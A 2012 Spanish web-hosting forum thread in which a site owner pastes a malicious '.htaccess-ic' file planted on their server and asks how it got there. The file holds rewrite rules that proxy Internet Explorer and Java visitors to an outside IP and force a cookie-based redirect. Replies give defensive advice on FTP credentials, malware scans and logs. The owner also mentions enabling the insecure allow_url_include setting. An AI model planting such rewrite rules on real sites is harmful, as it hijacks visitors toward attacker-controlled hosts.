Foros del Web » Administración de Sistemas » Shared Hosting y VPS »

.htaccess-ic ataque de redireccion..

Estas en el tema de .htaccess-ic ataque de redireccion.. en el foro de Shared Hosting y VPS en Foros del Web. Bueno primera vez que me pasa esto. Me aparecio en el hosting un archivos llamado ".htaccess-ic" que tenia el siguiente codigo.. Código PHP: RewriteEngine On RewriteCond  ...
  #1 (permalink)  
Antiguo 15/03/2012, 09:49
 
Fecha de Ingreso: marzo-2007
Mensajes: 782
Antigüedad: 17 años, 9 meses
Puntos: 16
.htaccess-ic ataque de redireccion..

Bueno primera vez que me pasa esto. Me aparecio en el hosting un archivos llamado ".htaccess-ic" que tenia el siguiente codigo..

Código PHP:
RewriteEngine On
RewriteCond 
%{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE [OR]
RewriteCond %{HTTP_USER_AGENTJava
RewriteRule Index
/(.*) http://109.236.81.64/$1 [P,L]

<FilesMatch "\.(html|htm|php|shtml|asp|aspx|jsp)$">
RewriteEngine On
##
RewriteCond %{HTTP_COOKIE} !^.*client.*$
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/4(.*)MSIE
RewriteRule 
.* http://%{HTTP_HOST}/Index/index.php [R,L]
##
Header set Set-Cookie"client=done;path=/;"
</FilesMatch
El cual me hizo desaparecer el "header" y "footer" de toda la web. Esto fue puesto a las 3am. Lo elimine y se arreglo el problema, creo que no le funciono totalmente a esta persona porque por lo que lei, esto tendria que haber redireccionado la web completamente a otra web pero solo la hizo funcionar mal. Eliminando los "includes".

Este ataque fue atravez de un "backdoor" .

Como paso esto? y como puedo prevenirlo?

Gracias
  #2 (permalink)  
Antiguo 15/03/2012, 13:33
Avatar de JoshMex
Moderador Webhosting
 
Fecha de Ingreso: enero-2006
Mensajes: 4.057
Antigüedad: 18 años, 10 meses
Puntos: 166
Respuesta: .htaccess-ic ataque de redireccion..

Cambia inmediatamente el password de tu cuentas ftp, verifica que tu pc no esté infectado por un spyware o troyano, no almacenes en los clientes ftp los password de su sitios, existen muchos virus que los roban y luego los hackers los usan para infectar tu web con scripts

Usas joomla, wordpress u otro script de este tipo en tu sitio?, es probable que también esté aprovechando alguna vulnerabilidad del script para infectar tus archivos.
__________________
JoshMex
Desarrollador Plataforma Microsoft / Windows / ASP / ASP.NET / SQL Server
Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos
  #3 (permalink)  
Antiguo 15/03/2012, 15:26
Avatar de Datacenter1
Usuario no validado
 
Fecha de Ingreso: agosto-2005
Ubicación: Chicago
Mensajes: 1.982
Antigüedad: 19 años, 4 meses
Puntos: 144
Respuesta: .htaccess-ic ataque de redireccion..

Hace un tiempo atrás escribí esto que puede ayudar http://www.forosdelweb.com/f57/ataques-htaccess-965789/
  #4 (permalink)  
Antiguo 15/03/2012, 21:05
 
Fecha de Ingreso: marzo-2007
Mensajes: 782
Antigüedad: 17 años, 9 meses
Puntos: 16
Respuesta: .htaccess-ic ataque de redireccion..

Borre ese archivo y me volvio a aparecer, esta web tiene muchas paginas .html y muy pocas en php el include que tiene ese un include de html no mas.

Voy a cambiar el FTP pero la verdad que no creo que sea eso, porque si no me hubieran borralo el .htaccess pero solo pusieron un .htaccess-ic . Es la 2da vez en el mismo dia.

El unico cambio fue en mi php.ini porque mi servidor no permitia "includes".
Entonces me dijeron que para permitirlo tenia que crear un archivo "php.ini" y poner esto:

allow_url_include = 1
allow_fopen_url = 1

Voy a leer esas ayudas gracias.
  #5 (permalink)  
Antiguo 16/03/2012, 02:06
Avatar de cincinnati  
Fecha de Ingreso: noviembre-2002
Ubicación: Cerca, muy cerca
Mensajes: 971
Antigüedad: 22 años, 1 mes
Puntos: 29
Respuesta: .htaccess-ic ataque de redireccion..

Cita:
pero la verdad que no creo que sea eso
Casi seguro que SÍ es eso. Pero además de cambiar la contraseña de tu FTP, analiza también tu PC en búsqueda de troyanos, virus y demás habitantes maliciosos pues suele ser de ahí de donde "pillan" la contraseña de tu FTP.
__________________
Be water my friend
  #6 (permalink)  
Antiguo 16/03/2012, 09:00
 
Fecha de Ingreso: marzo-2007
Mensajes: 782
Antigüedad: 17 años, 9 meses
Puntos: 16
Respuesta: .htaccess-ic ataque de redireccion..

Ya lo hice, igualmente tengo la computadora limpia con un buen antivirus pago. Como dije antes si ellos tubieran la contrasena, harian mas dano, hubieran editado el .htaccess en vez de agregar otro.. Yo creo que hay un "backdoor" al habilitar "allow_url_include" y "allow_fopen_url" porque ya lei en varios blogs que hay ataques de .htaccess cuando estos estan habilitados..

Alguna otra idea para usar "includes" con php cuando estos estan deshabilitados?

gracias por la ayuda...
  #7 (permalink)  
Antiguo 16/03/2012, 09:45
Avatar de Datacenter1
Usuario no validado
 
Fecha de Ingreso: agosto-2005
Ubicación: Chicago
Mensajes: 1.982
Antigüedad: 19 años, 4 meses
Puntos: 144
Respuesta: .htaccess-ic ataque de redireccion..

Verifica los logs de acceso de FTP y saldrás de dudas si es por ftp que lo están haciendo

Hay una forma de hacer los includes con curl pero no soy programador alguien con más experiencia en esa área podrá ayudarte mejor

Etiquetas: hosting, ataques, hosts
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:18.